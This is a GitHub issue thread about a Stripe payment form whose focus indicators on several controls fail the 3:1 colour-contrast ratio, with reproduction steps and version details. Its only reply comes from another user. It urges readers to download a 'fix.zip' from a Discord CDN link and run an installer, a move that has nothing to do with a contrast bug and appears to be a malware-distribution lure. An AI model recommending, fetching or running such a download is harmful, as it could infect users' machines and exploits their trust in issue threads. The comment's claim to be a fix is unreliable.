### ISSUE TITLE
Color Contrast ratio of the focus indicator on 'save your info...' checkbox, 'country', 'Link', 'Terms', 'Privacy policy', 'Learn more' controls is less than required ratio 3:1

### ISSUE THREAD

**Issue by msftedad** [flutter-stripe/flutter_stripe#1910]
**Describe the bug**
Color Contrast ratio of the focus indicator on 'save your info...' checkbox, 'country', 'Link', 'Terms', 'Privacy policy', 'Learn more' controls is less than required ratio 3:1

**To Reproduce**

1. Launch URL: https://site-ux5ko.powerappsportals.com/pay/
2. A new donation page appears. fill in the valid card details, Tab till 'Save your info...' checkbox. Activate it with the enter key. Content appears below.
3. Navigate to 'save your info...' checkbox, 'country', 'Link', 'Terms', 'Privacy policy', 'Learn more'
4. Open Accessibility Insights for Windows tool.
5. Verify whether Luminosity ratio of the focus indicator on 'save your info...' checkbox, 'country', 'Link', 'Terms', 'Privacy policy', 'Learn more' is less than the minimum required ratio 3:1 or not.

**Expected behavior**
Color Contrast ratio of the focus indicator on 'save your info...' checkbox, 'country', 'Link', 'Terms', 'Privacy policy', 'Learn more' controls should be greater than or equal to 3:1.

Versions:
OS: Windows 11 Version 24H2 (OS Build 26100.1301)
Browser: Microsoft New Edge Version 127.0.2651.86 (Official build) (64-bit)
Library .net version - 4.6.1
Project .net version - 4.8 
Library name - stripe.net version - 42.3.0
pAi version - 2024-04-10

**Additional context**

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
